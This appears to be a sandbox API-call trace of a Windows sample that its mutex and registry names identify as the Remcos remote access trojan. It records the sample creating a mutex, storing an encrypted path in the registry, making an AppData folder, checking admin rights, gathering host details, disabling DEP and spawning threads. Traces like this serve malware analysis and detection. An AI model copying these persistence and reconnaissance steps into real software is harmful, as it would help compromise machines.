[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206858
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206868
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206878
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206888
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206898
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068a8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068b8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068c8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068d8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068e8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068f8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206908
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206918
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206928
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206938
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206948
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206958
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206968
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206978
[0228.003] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206988
[0228.003] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206998
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.003] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] free (_Block=0x22074a0)
[0228.004] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x19fe98
[0228.004] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fea8
[0228.004] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4157e8
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.004] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Remcos_Mutex_Inj") returned 0x0
[0228.005] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207119
[0228.005] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\remcos_enhatfsgar\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fe80 | out: phkResult=0x19fe80*=0x0) returned 0x2
[0228.005] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415978
[0228.005] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22004a1
[0228.005] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="remcos_enhatfsgar") returned 0x198
[0228.005] GetLastError () returned 0x0
[0228.005] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x764d0000
[0228.107] GetProcAddress (hModule=0x764d0000, lpProcName="GetModuleFileNameExA") returned 0x764d1660
[0228.107] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x764d0000
[0228.108] GetProcAddress (hModule=0x764d0000, lpProcName="GetModuleFileNameExW") returned 0x764d13e0
[0228.108] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000
[0228.108] GetProcAddress (hModule=0x76720000, lpProcName="GlobalMemoryStatusEx") returned 0x7673afe0
[0228.108] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000
[0228.108] GetProcAddress (hModule=0x76720000, lpProcName="IsWow64Process") returned 0x76739f10
[0228.108] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000
[0228.108] GetProcAddress (hModule=0x76720000, lpProcName="GetComputerNameExW") returned 0x76745d40
[0228.108] GetModuleHandleA (lpModuleName="Shell32") returned 0x74eb0000
[0228.109] GetProcAddress (hModule=0x74eb0000, lpProcName="IsUserAnAdmin") returned 0x7515db90
[0228.109] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000
[0228.109] GetProcAddress (hModule=0x76720000, lpProcName="SetProcessDEPPolicy") returned 0x7673ef30
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2205f99
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206059
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22060e9
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206149
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22061a9
[0228.109] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206209
[0228.109] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41580c, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe")) returned 0x62
[0228.109] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fe80 | out: phkResult=0x19fe80*=0x19c) returned 0x0
[0228.109] RegQueryValueExA (in: hKey=0x19c, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x19fa70, lpcbData=0x19fe70*=0x400 | out: lpType=0x0, lpData=0x19fa70*=0x57, lpcbData=0x19fe70*=0xf) returned 0x0
[0228.109] RegCloseKey (hKey=0x19c) returned 0x0
[0228.110] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fe98
[0228.110] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415968
[0228.110] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.110] GetCurrentProcess () returned 0xffffffff
[0228.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19fe80 | out: Wow64Process=0x19fe80*=1) returned 1
[0228.110] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z () returned 0x415968
[0228.110] IsUserAnAdmin () returned 1
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206cf9
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206e79
[0228.110] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202ec1
[0228.110] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z () returned 0x4157f8
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202ca1
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202ac9
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202af9
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202d59
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202d89
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202b39
[0228.110] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202b39
[0228.110] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z () returned 0x4157d0
[0228.110] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207119
[0228.110] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\remcos_enhatfsgar\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fe84 | out: phkResult=0x19fe84*=0x0) returned 0x2
[0228.111] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x62
[0228.111] ??2@YAPAXI@Z () returned 0x2202db8
[0228.111] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22004d1
[0228.111] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xa9
[0228.111] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22029c9
[0228.111] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x62
[0228.111] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207119
[0228.111] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fa24
[0228.111] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202e29
[0228.111] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fe58
[0228.111] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.111] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fa34
[0228.111] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\remcos_enhatfsgar\\", phkResult=0x19fa2c | out: phkResult=0x19fa2c*=0x1a0) returned 0x0
[0228.112] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x63
[0228.112] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202e29
[0228.112] RegSetValueExA (in: hKey=0x1a0, lpValueName="EXEpath", Reserved=0x0, dwType=0x1, lpData="~n³j?Ê÷]õC\x9e,´ö÷²¾ÏÎ;\x17\x8f-ª\x93Û'ÉÂâºê\x1f²\rl\x96Ó¶©!®,\x82\x0f\x8b1Ð\x8f\x96¼ÃD³\x17\x0bÎ\x84\"\r\x8f%ÍvÓÜ£Ñ", cbData=0x63 | out: lpData="~n³j?Ê÷]õC\x9e,´ö÷²¾ÏÎ;\x17\x8f-ª\x93Û'ÉÂâºê\x1f²\rl\x96Ó¶©!®,\x82\x0f\x8b1Ð\x8f\x96¼ÃD³\x17\x0bÎ\x84\"\r\x8f%ÍvÓÜ£Ñ") returned 0x0
[0228.112] RegCloseKey (hKey=0x1a0) returned 0x0
[0228.112] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.113] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.113] free (_Block=0x2202db8)
[0228.113] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0228.113] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207299
[0228.113] atoi (_Str="0") returned 0
[0228.113] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206239
[0228.113] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fec8
[0228.113] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0228.113] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206ed9
[0228.113] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2205ff9
[0228.113] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fe64
[0228.113] getenv (_VarName="AppData") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming"
[0228.113] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z () returned 0x19fe64
[0228.113] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202db9
[0228.116] GetLongPathNameA (in: lpszShortPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpszLongPath=0x19fcf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x25
[0228.117] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fe54
[0228.117] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fe44
[0228.117] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fe24
[0228.117] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fe34
[0228.117] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fe98
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.117] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415720
[0228.117] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.118] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22069b1
[0228.118] CreateDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\vbmcdsb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\vbmcdsb"), lpSecurityAttributes=0x0) returned 1
[0228.119] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fea8
[0228.119] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fe98
[0228.119] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fec8
[0228.119] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.119] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.119] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fe7c
[0228.119] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415710
[0228.119] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0228.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40382c, lpParameter=0x4156c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0
[0228.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40380c, lpParameter=0x4156c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c
[0228.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40383b, lpParameter=0x4156c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4
[0228.121] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.121] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206119
[0228.121] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206089
[0228.121] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2205ea9
[0228.121] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22071a9
[0228.121] GetComputerNameExW (in: NameType=0x1, lpBuffer=0x19fe34, nSize=0x19fe78 | out: lpBuffer="xc64ZB", nSize=0x19fe78) returned 1
[0228.121] GetUserNameW (in: lpBuffer=0x19fc34, pcbBuffer=0x19fe74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fe74) returned 1
[0228.128] ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z () returned 0x19fe54
[0228.128] ??$?HGU?$char_traits@G@std@@V?$allocator@G@1@@std@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z () returned 0x19fe64
[0228.128] ??$?HGU?$char_traits@G@std@@V?$allocator@G@1@@std@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z () returned 0x19fe98
[0228.128] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0228.128] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0228.128] ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415988
[0228.128] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0228.128] SetProcessDEPPolicy (dwFlags=0x0) returned 0
[0228.128] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206ea9
[0228.128] atoi (_Str="0") returned 0
[0228.128] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fb34
[0228.128] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fb24
[0228.128] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fb04
[0228.128] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x21
[0228.128] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x20
[0228.128] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fae4
[0228.128] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb04
[0228.128] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.128] ??2@YAPAXI@Z () returned 0x2202d30
[0228.128] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d30
[0228.128] free (_Block=0x0)
[0228.128] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x1
[0228.128] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x21
[0228.128] ??2@YAPAXI@Z () returned 0x2202b68
[0228.128] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202b68
[0228.129] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.129] free (_Block=0x2202d30)
[0228.129] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.129] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.129] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
